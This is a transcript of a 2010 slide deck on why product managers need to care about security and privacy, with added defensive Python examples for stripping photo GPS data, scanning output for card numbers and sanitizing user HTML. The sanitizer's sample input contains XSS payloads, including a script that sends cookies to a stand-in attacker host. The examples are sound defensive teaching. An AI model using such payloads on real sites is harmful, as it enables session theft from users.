What every product manager needs to know about security

About The AIPMM
The Association of International Product Marketing and Management (AIPMM), founded in 1998, promotes worldwide excellence in product management education and provides training, education, certification and professional networking opportunities. With members in 65 countries, the AIPMM is the Worldwide Certifying Body of product team professionals and offers globalized trainings and credentials localized for specific markets designed to meet the challenges of a constantly changing business landscape. As the only professional organization that addresses the entire product lifecycle from inception to obsolescence in any industry, the AIPMM supports strategic partners with offerings in Europe, the Middle East, Australia, and Southeast Asia, as well as North America.

AIPMM Membership benefits include the national Product Management Educational Conference, regional conferences, the Career Center, peer Forums, tools, templates, publications and eligibility to enroll in the Certification Programs. The Agile Certified Product Manager® (ACPM), Certified Product Manager® (CPM), Certified Product Marketing Manager® (CPMM), Certified Brand Manager® (CBM), and Certified Innovation Leader (CIL) programs allow individual members to demonstrate their level of expertise and provide corporate members an assurance that their product professionals are operating at peak performance.
http://www.AIPMM.com
Subscribe: http://www.aipmm.com/subscribe
LinkedIn: http://www.linkedin.com/company/aipmm
Membership: http://www.aipmm.com/join.php
Certification: http://aipmm.com/html/certification
Webinar Series: http://aipmm.com/aipmm_webinars/
Articles: http://www.aipmm.com/html/newsletter/article.php

Transcript of "What every product manager needs to know about security"

1. What Every Product Manager Needs to Know About Security
   Protecting Your Brand and Revenue
   Phil Burton, Principal Consultant and Trainer, 280 Group LLC
   © 2010 280 Group LLC
2. Agenda
   • Why Is Information Security Important?
   • Causes of Website Insecurity
   • Issues and Consequences
   • Market Requirements
   • Takeaway Ideas
3. Why is Information Security Important to You?
   • Effective privacy requires excellent security
     – not always understood by “privacy advocates”
   • Lack of effective privacy (security) can damage your business model:
     loss of trust and reputation → brand damage → decreases in site visitors → lower revenue
   • Real risk of government regulation in US, EU
4. What Is Information Security?
   • Information security broadly defined
     – Confidentiality of data
       • Privacy
       • Controlled access
     – Integrity of data and systems
       • Data has not been modified
       • Systems function as intended
     – Availability of systems and data
       • Systems online and functioning
       • Data available whenever needed
   • Traditional applications protect corporate networks and consumer systems
5. Threats to Website Security
   • Professional criminals, in organized gangs
     – Eastern Europe, “Nigeria,” parts of Asia
     – Anywhere in the world
     – Relatively risk free and no geographic limitations
     – Using social media websites to distribute malware that gets downloaded to users’ systems
   • Repressive governments
     – China, “cyberwar”
   • New developments almost daily
6. Causes of Website Insecurity
   • Corporate policy
     – Business model monetizes private data
     – Complete indifference to privacy issues
   • Poor operations and programming practices
     – Badly designed, buggy software and configurations
     – Hackers “contribute” content with malware or forcefully plant malware
   • Lack of user education
     – Users don’t know how or why to protect private data
     – “Social engineering” tricks users
7. Corporate Policy Causing Privacy Issues
   • “Your Privacy Isn’t So Private” – San Jose Mercury-News, Tech Files column, May 3, 2010
     – Facebook is “cavalier” with privacy of its users
     – “Alarm bells went off in my head over the privacy issues”
     – “Astonishing how much information Facebook now considers ‘public’ and is sharing with its marketing partners”
   • Facebook login allows users to log in to other websites
8. Corporate Policy Causing Privacy Issues
   • “A Blurring Line: Private and Public” – NY Times, Bits column, March 15, 2010
     – Google Buzz service a “complete disaster” by linking email accounts to status updates on social networks
     – Facebook makes members’ information public by default
     – Issue is “broader muddying of the line between what is private and what is public online.”
9. Corporate Policy: Facebook Places issue
   • Facebook announced location service “Places” August 18, 2010
   • Immediate criticism of the “opt-in by default” setting: users were enrolled unless they opted out
     – No single opt-out setting
     – No ability to control which people can see a check-in
     – Friends can “check in” a user without permission
     – Available to Facebook partners and phone apps
10. Corporate Indifference: Photos Uploaded To Websites Reveal Exact Location
   • “Geotags” (GPS fields in the photo’s Exif metadata) in uploaded photos identify exact location
   • Children, friends, houses, expensive cars, etc.
   • Website APIs make it easy for criminals and stalkers to locate on Google Maps
     – “Cyber-casing”
   • Users “compromising their privacy, if not their safety”
   • Stripping all “metadata” from photos can run into copyright law (in the US, removing copyright management information is restricted by DMCA §1202), so location fields should be removed selectively rather than wholesale
   • Smartphones and websites need better user controls
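The slide names the control (strip the location before publishing) without showing it. What follows is an added example, not from the original deck or from any site or product it names: it walks a JPEG's marker segments, reads the Exif GPS IFD out of the APP1 segment to report what an upload would leak, and returns a copy with the Exif segment removed, which is the server-side check a site should run before a photo reaches a public URL. The JPEG and Exif bytes are constructed inline (a JFIF header, one Exif block, no picture data), the coordinates are made up, and every function name here is this example's own. Dropping the whole APP1 segment also discards camera and copyright fields; a deployment that must keep those would rewrite only the GPS IFD, or use a library such as Pillow or exiftool to do so.

```python
import struct

EXIF_HEADER = b"Exif\x00\x00"
TAG_GPS_IFD = 0x8825          # IFD0 entry that points at the GPS IFD
GPS_TAGS = {1, 2, 3, 4}       # LatitudeRef, Latitude, LongitudeRef, Longitude


def iter_jpeg_segments(data):
    """Yield (marker, start, end) for each marker segment up to SOS or EOI."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("marker expected at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xD9:                     # EOI: standalone marker
            yield marker, pos, pos + 2
            return
        if marker == 0xDA:                     # SOS: entropy-coded data follows
            yield marker, pos, len(data)
            return
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        end = pos + 2 + length
        if length < 2 or end > len(data):
            raise ValueError("bad segment length at offset %d" % pos)
        yield marker, pos, end
        pos = end


def is_exif_segment(data, marker, start):
    return marker == 0xE1 and data[start + 4:start + 10] == EXIF_HEADER


def read_ifd(tiff, endian, offset):
    """Map tag -> (type, count, raw 4-byte value/offset field) for one IFD."""
    count = struct.unpack(endian + "H", tiff[offset:offset + 2])[0]
    entries = {}
    for i in range(count):
        e = offset + 2 + 12 * i
        tag, typ, n = struct.unpack(endian + "HHI", tiff[e:e + 8])
        entries[tag] = (typ, n, tiff[e + 8:e + 12])
    return entries


def dms_to_degrees(tiff, endian, raw):
    """Three RATIONALs (deg, min, sec) stored at the offset held in `raw`."""
    off = struct.unpack(endian + "I", raw)[0]
    v = struct.unpack(endian + "6I", tiff[off:off + 24])
    if 0 in (v[1], v[3], v[5]):
        raise ValueError("zero denominator in GPS rational")
    return v[0] / v[1] + v[2] / v[3] / 60 + v[4] / v[5] / 3600


def exif_gps(tiff):
    """(lat, lon) in decimal degrees, or None if the Exif block has no GPS fix."""
    endian = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if endian is None:
        raise ValueError("bad TIFF byte-order mark")
    ifd0 = read_ifd(tiff, endian, struct.unpack(endian + "I", tiff[4:8])[0])
    if TAG_GPS_IFD not in ifd0:
        return None
    gps_off = struct.unpack(endian + "I", ifd0[TAG_GPS_IFD][2])[0]
    gps = read_ifd(tiff, endian, gps_off)
    if not GPS_TAGS.issubset(gps):
        return None
    lat = dms_to_degrees(tiff, endian, gps[2][2])
    lon = dms_to_degrees(tiff, endian, gps[4][2])
    if gps[1][2][:1] == b"S":
        lat = -lat
    if gps[3][2][:1] == b"W":
        lon = -lon
    return lat, lon


def photo_location(jpeg):
    """What the uploaded file would tell a stalker: (lat, lon) or None."""
    for marker, start, end in iter_jpeg_segments(jpeg):
        if is_exif_segment(jpeg, marker, start):
            return exif_gps(jpeg[start + 10:end])
    return None


def strip_exif(jpeg):
    """Copy of the JPEG with every APP1 Exif segment removed; all else byte-for-byte."""
    out = bytearray(jpeg[:2])
    for marker, start, end in iter_jpeg_segments(jpeg):
        if not is_exif_segment(jpeg, marker, start):
            out += jpeg[start:end]
    return bytes(out)


# --- Constructed sample: a JPEG skeleton (no picture data) carrying one made-up GPS fix ---
def rational3(d, m, s_num, s_den):
    return struct.pack("<6I", d, 1, m, 1, s_num, s_den)

def build_sample_exif():
    tiff = b"II*\x00" + struct.pack("<I", 8)                                   # IFD0 at 8
    tiff += struct.pack("<H", 1) + struct.pack("<HHII", TAG_GPS_IFD, 4, 1, 26) + struct.pack("<I", 0)
    tiff += struct.pack("<H", 4)                                                # GPS IFD at 26
    tiff += struct.pack("<HHI4s", 1, 2, 2, b"N\x00\x00\x00")
    tiff += struct.pack("<HHII", 2, 5, 3, 80)                                   # latitude rationals at 80
    tiff += struct.pack("<HHI4s", 3, 2, 2, b"W\x00\x00\x00")
    tiff += struct.pack("<HHII", 4, 5, 3, 104)                                  # longitude rationals at 104
    tiff += struct.pack("<I", 0)
    tiff += rational3(37, 46, 3000, 100)                                        # 37 deg 46' 30.00" N (made up)
    tiff += rational3(122, 25, 600, 100)                                        # 122 deg 25' 06.00" W (made up)
    return tiff

def build_sample_jpeg(tiff):
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    app1 = EXIF_HEADER + tiff
    return (b"\xff\xd8"
            + b"\xff\xe0" + struct.pack(">H", len(app0) + 2) + app0
            + b"\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1
            + b"\xff\xd9")

if __name__ == "__main__":
    sample = build_sample_jpeg(build_sample_exif())
    print("as uploaded:", photo_location(sample))
    print("after strip:", photo_location(strip_exif(sample)))
```

Run it on the upload path before the file touches storage or a CDN, and treat a non-None `photo_location` on an already-published URL as a test failure: the check that matters is on the bytes a stranger can fetch, not on the bytes the user sent.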
11. Issues From Poor Operations and Programming Practices
   • The “niece’s blog” – not so private
     – The aunt periodically did a Google search on nieces and nephews to keep up with their activities
     – The niece was a college freshman
     – Wrote one blog for parents and relatives
     – Wrote a second blog just for friends
       • Password protected
       • Drugs, sex, wild parties, disparaging comments on family
     – Google found it with normal “spidering” (so the password gated the login page, not the pages the crawler fetched)
12. Issues From Poor Operations and Programming Practices
   • Application reveals credit card numbers
13. Issues From Poor Operations and Programming Practices
   • Not enough testing
     – http://techie-buzz.com/tech-news/credit-card-numbers-of-blippy-users-show-up-on-google.html (April 23, 2010)
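Slides 12 and 13 describe card numbers turning up in a site's public output, and the fix they name is testing. As an added example, not from the deck or from the site it cites, here is the check a release pipeline or log scrubber can run over rendered pages, feeds and logs: find digit runs that look like a card number and keep only the ones that pass the Luhn check, so phone numbers and order IDs do not drown the real hits. The sample feed lines are constructed; the card numbers in them are the card networks' published test numbers, not real accounts; function names are this example's own.

```python
import re

# Candidate PAN: 13 to 19 digits, optionally separated by single spaces or hyphens.
# The pattern is deliberately loose; the Luhn check below does the filtering.
_PAN_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits):
    """Luhn (ISO/IEC 7812) check digit validation over an ASCII digit string."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = ord(ch) - 48
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_pans(text):
    """Card-number-looking strings in `text` that also pass Luhn."""
    hits = []
    for m in _PAN_CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            hits.append(m.group(0))
    return hits


def mask_pan(pan):
    """First six and last four digits (the usual receipt format); the rest masked."""
    digits = re.sub(r"[ -]", "", pan)
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def scan_lines(lines):
    """Pre-release check: (line_no, masked_pan) for every Luhn-valid PAN in the output."""
    findings = []
    for n, line in enumerate(lines, 1):
        for pan in find_pans(line):
            findings.append((n, mask_pan(pan)))
    return findings


# Constructed sample of a public activity feed. The card numbers are the
# networks' published test numbers, not real accounts.
SAMPLE_FEED = [
    '{"user":"alice","text":"Lunch at the taqueria, $12.40"}',
    '{"user":"bob","text":"Paid with Visa 4111 1111 1111 1111 - tacos!"}',
    '{"user":"carol","text":"Order #1234567890123 shipped"}',
    '{"user":"dave","text":"Card on file: 5555-5555-5555-4444"}',
    '{"user":"erin","text":"call me at 415-555-0100"}',
]

if __name__ == "__main__":
    for line_no, masked in scan_lines(SAMPLE_FEED):
        print("line %d: card number exposed, %s" % (line_no, masked))
```

The order ID on line 3 is thirteen digits long and still passes through, because it fails Luhn; that is the whole point of pairing the regex with the check. Wire `scan_lines` into the integration tests that render public pages and feeds, and fail the build on any finding.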
14. Issues From Poor Operations and Programming Practices
   • Insufficient testing or poor configuration reveals private chats on Facebook
15. Issues From Poor Operations and Programming Practices
   • Hackers successfully penetrate well-known site
     – Hackers plant “drive-by downloads” on poorly protected sites
       • safeweb.norton.com/buzz
16. Issues from Poor Operations and Programming Practices
   • AT&T website exposed device IDs and email addresses of 114,000 iPad owners
     – dozens of CEOs, military officials, and top politicians
     – FBI investigating
     – Wall Street Journal, June 11, 2010
17. User Education: “Forget Email... Social's the New Spam Vector”
   • “… this shift in spammer strategy from email to social networking sites tracks perfectly with users' online behavior”
   • “spammers are counting on … our collective naïveté.”
18. Privacy Issue Consequences
   • Sun Microsystems Alumni Assn. threads about security on Facebook and Yahoo
     – My yahoo e-mail account was hacked about a year ago. … When I tried to report this to yahoo support, I received a return e-mail asking for my account name and password.
     – Obviously, this account is toast for anything but the most casual use. … I regard Yahoo mail, Facebook, and any social networking site as a threat to my security and use such things very little.
19. Privacy Issue Consequences
   • “Facebook Seeps Onto Other Web Sites,” – NY Times, April 19, 2010
     – Analysts say Facebook’s desire to spread its tentacles across the Web could run into privacy hurdles, as it will require the company to share increasing amounts of personal information about its users with other sites.
     – “They are going to have to secure more consumers’ approval for data-sharing,” said Augie Ray, analyst at Forrester Research.
20. Privacy Issue Consequences
   • Increased Privacy Concerns – “Tell-All Generation Keeps Some Things Offline,” – NY Times, May 9, 2010
     – “Mistrust of the intentions of social sites appears to be pervasive … telephone survey found 88 percent of 18- to 24-year-olds said there should be a law … to delete stored information [on social media websites.]”
     – “Two weeks ago, Senator Charles Schumer … petitioned the Federal Trade Commission to review privacy policies of social networks.”
21. Mark Zuckerberg Doesn’t Value Privacy
   • January 9, 2010
   • April 23, 2010
22. Zuckerberg Admits Mistakes About Privacy
   • May 24, 2010
23. Zuckerberg Public Letter Really Targets Federal Government
   • Zuckerberg letter to blogger and Op-Ed piece in Wash. Post, May 24, 2010 – http://www.washingtonpost.com/wp-dyn/content/article/2010/05/23/AR2010052303828.html
     – “There needs to be a simpler way to control your information,” he wrote. “In the coming weeks, we will add privacy controls that are much simpler to use. We will also give you an easy way to turn off all third-party services.”
     – First response to “furor over Facebook's user privacy moves that left the site with a public relations problem and fighting to defend its reputation.”
24. Damage to Facebook Brand
   • Why Facebook’s “private” messages are a joke, Jesse Stanchak, May 6, 2010, http://smartblogs.com/socialmedia/2010/05/06/why-facebooks-private-messages-are-a-joke/
   • ACLU Weighs in on Facebook’s Privacy Issues, Rex Gradeless, May 13, 2010, http://socialmedialawstudent.com/featured/aclu-weighs-in-on-facebooks-privacy-issues/
   • 6 Alternatives to Facebook, Itamar Kestenbaum, May 20, 2010, http://www.socialmediatoday.com/SMC/199443
25. Damage to Facebook Brand
   • Facebook, privacy settings and taking control of your personal brand online, Matt Rhodes, 26 May 2010, http://www.freshnetworks.com/blog/2010/05/facebook-privacy-settings-and-taking-control-of-your-personal-brand-online/
   • Social Media: The Privacy and Security Repercussions, Johnny Widerlund, Search Engine Watch, June 19, 2010, http://searchenginewatch.com/3640696
   • Give some thought to social media and privacy, Janet Fouts, July 9, 2010, http://janetfouts.com/social-media-privacy/
26. A Different View of User Privacy
   • Steve Jobs on privacy:
     – “… different view … than some of our colleagues in the Valley. We take privacy very seriously.”
     – “Privacy means people know what they’re signing up for. In plain English. … repeatedly”
     – “Let them know precisely what you’re going to do with their data.”
     – Wall Street Journal, Technology, Kara Swisher and Walt Mossberg, June 7, 2010, p. R3.
27. More Consequences
   • June 2010 Consumer Reports
     – Two out of three online U.S. households use social networks such as Facebook and MySpace, nearly twice as many as a year ago.
     – But “millions … put themselves and their families at risk by exposing very sensitive personal information,” … national survey of 2,000 online households conducted in January.
28. Eric Schmidt calling for a “Young Adult Witness Protection Program?”
   • “[Schmidt] predicts, apparently seriously, that every young person one day will be entitled automatically to change his or her name on reaching adulthood in order to disown youthful hijinks stored on their friends' social media sites.”
   • Technical solution to important policy issue?
   • Doesn’t Google have any responsibility here?
29. Brand Damage: Poor Opinion of Social Media websites
   • ForeSee Results, Annual E-Business Report for the American Customer Satisfaction Index (ACSI), July 20, 2010
     – http://www.foreseeresults.com/research-white-papers/ACSI-e-business-report-2010.shtml
   • “…interviews with approx. 70,000 customers …to measure satisfaction with more than 200 companies in 44 industries and 10 economic sectors”
   • Key finding: “Social Media: Customer satisfaction with social media sites is poor (70) … lowest industry aggregate score of any of the e-business or e-retail industries.”
     – Better than only airlines and subscription TV (66)
30. “Social Insecurity”
   “We're just at the beginning (italics added for emphasis) of seeing what the implications are for so much information being posted on social networks,” Nicole Ozer, technology and civil liberties policy director, ACLU of Northern California.
31. Is This the Future?
32. Privacy Issue Consequences
   • “‘Cookies’ Cause Bitter Backlash” – Wall Street Journal, September 19, 2010, http://online.wsj.com/article_email/SB10001424052748704416904575502261335698370-lMyQjAxMTAwMDIwMDEyNDAyWj.html
   • Companies now using “Flash cookies” that can “re-spawn” after being deleted by user
   • Six lawsuits filed since July
   • “There are some in the industry who do not believe that users should be able to block tracking…,” Chris Hoofnagle, director, Berkeley Center for Law & Technology's information-privacy programs
   • Two bills introduced into Congress
   • Federal Trade Commission expected to issue new guidelines by December.
33. Twitter Settles Federal Trade Commission Charges
   • FTC charged Twitter deceived consumers and put privacy at risk
   • First case by FTC against social media site
   • Complaint charged poor security allowed hackers to gain admin control, send phony tweets
   • Twitter barred for 20 years from misleading consumers about security, privacy, confidentiality; also must create comprehensive security program, with outside auditing
34. A Legal Precedent for User Privacy Legislation
   • State privacy laws – California SB 1386
     – Effective July 1, 2003
     – Requires an agency, person or business that conducts business in California … to disclose any breach of security (to any resident).
     – Similar laws now in force in 46 states in US
   • What would be the impact if these laws were extended to general privacy issues?
35. Market Requirements
   • Well-researched Market Requirements should cover both stated and unstated (latent) needs
     – Waterfall or Agile, both need Requirements
   • Security needs not called out because they are “universally understood” or perhaps not understood
36. Market Requirements
   • Who understands security (privacy)?
     – Almost all end users (business, consumer/home) do not begin to understand security issues
     – Most Line of Business owners prioritize time-to-market, or won’t invest in effective security
     – Most product managers don’t understand security
     – Many software developers do not know how to write secure code
     – IT often deploys insecure websites and networks
37. Market Requirements
   • Product manager must take leadership role to articulate unspoken market requirements
     – Protect your company’s brand and revenue
     – Perhaps protect your career
   • Security and Privacy Policy
     – User privacy respected by web site owner company and third parties, including advertisers
     – User data protected from unauthorized access by individuals and companies
38. Market Requirements
   • User Education
     – Educated about managing their data
     – Educated about privacy implications of sharing data
     – Provided with effective and timely advice and warnings about social engineering attacks
     – Get effective help if they suspect a security issue
39. Market Requirements
   • Programming, Administration and Operations
     – Test all changes to prevent exposure of user data
     – Simplify data sharing options and default to NONE
     – Ensure that user-posted content is safe
     – Detect and remove malware planted by hackers
     – Work with security vendors on emerging threats
     – Notify users proactively of security breaches, even if not required by law
     – Include partners in security programs
     – Maintain ongoing programs and provide sufficient resources, including outside help
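“Ensure that user-posted content is safe” on this slide and the drive-by downloads of slide 15 are the same engineering requirement: never echo user-supplied HTML unfiltered. As an added example that is not from the deck, here is an allowlist sanitizer built on the standard library's html.parser. It keeps a small set of formatting tags, drops script, style, iframe, object and embed together with their contents, removes every on* event-handler attribute, and only lets an href through when its scheme is http, https or mailto or it is a same-site path (so javascript: and data: URLs are rejected even with whitespace smuggled into the scheme). The tag and attribute lists are this example's own choices, and the sample input is constructed.

```python
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li",
                "blockquote", "code"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
VOID_TAGS = {"br"}
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed"}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")


def safe_href(value):
    """Return the href unchanged if its scheme is allowed, else None."""
    v = (value or "").strip()
    # Browsers ignore whitespace/control characters inside the scheme, so compare
    # against a copy with those removed ("jav\tascript:" must still be caught).
    compact = "".join(ch for ch in v if ch.isprintable() and not ch.isspace()).lower()
    if compact.startswith(SAFE_URL_SCHEMES):
        return v
    if compact.startswith("/") and not compact.startswith("//"):   # same-site path
        return v
    return None


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._drop_depth = 0        # > 0 while inside script/style/iframe/...

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self._drop_depth += 1
            return
        if self._drop_depth or tag not in ALLOWED_TAGS:
            return                  # unknown tag: drop the tag, keep its text
        kept = []
        for name, value in attrs:
            if name.startswith("on"):                  # event handlers, never
                continue
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href":
                value = safe_href(value)
                if value is None:
                    continue
            kept.append(' %s="%s"' % (name, escape(value or "", quote=True)))
        if tag == "a":
            kept.append(' rel="nofollow noopener"')
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self._drop_depth = max(0, self._drop_depth - 1)
            return
        if self._drop_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._drop_depth:
            self.out.append(escape(data, quote=False))   # text is re-escaped on output

    def handle_comment(self, data):
        pass                        # comments dropped (old IE conditional-comment vector)


def sanitize_html(fragment):
    """Allowlist-sanitize one user-supplied HTML fragment."""
    p = AllowlistSanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out)


# Constructed sample of what a hostile "contribution" looks like.
SAMPLE_POST = ('<p onclick="steal()">Nice photo! <b>Really</b>'
               '<script>document.location="http://evil.example/?c="+document.cookie</script>'
               '<a href="javascript:alert(1)">click</a> '
               '<a href="https://example.com/?a=1&b=2">source</a>'
               '<img src=x onerror=alert(1)></p>')

if __name__ == "__main__":
    print(sanitize_html(SAMPLE_POST))
```

Sanitize at the boundary where the content is stored and again where it is rendered into a page; the second pass costs little and covers content that reached the database by another path. An allowlist is the right shape because the attacker chooses the tags; a denylist of known-bad ones is always one browser feature behind.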
40. Takeaway Ideas
   • You must understand the business consequences of poor security and privacy
     – It’s only your company’s business model and maybe your career
   • As the product champion, you must articulate the issues and document the requirements inside your organization
   • You do not have to be a security expert
   • Read my blog – www.280group.com/blog/
41. 280 Group Free Resources
   • Free templates and white papers
   • 2009 Product Management Survey Results
   • PM Job listing sites
   • 280 Group Product Management 2.0 Newsletter
   • 280 LinkedIn Group
   • Product Management 2.0 Blog
   • Books
   • PMA listings
   Go to www.280group.com in the “Resources” section.
42. 280 Group – The Product Marketing & Product Management Experts™
   • Consulting & Contractors
   • Toolkits & PM Office™ (Product Manager’s, Roadmaps, Launches, Beta, Reviews)
   • Training: public & private
     – PM Fast Track™
     – Agile Excellence for Product Managers
     – Customer & Market Research
     – Effective Decision Making
     – Interactivity & Communication
     – Market Value Pricing
     – Personal Strategic Plans For PMs
     – Time Management & Productivity
     – GREAT Demos!
   • Certifications: Self-Study & In-Person Courses
     – Agile Certified Product Manager™
     – Certified Product Manager™
     – Certified Product Marketing Manager™
43. Closure
   • Questions
   • Contact me later
     – phil@280group.com
     – (650) 766 9970
     – http://tungle.me/philburton to set up an appointment
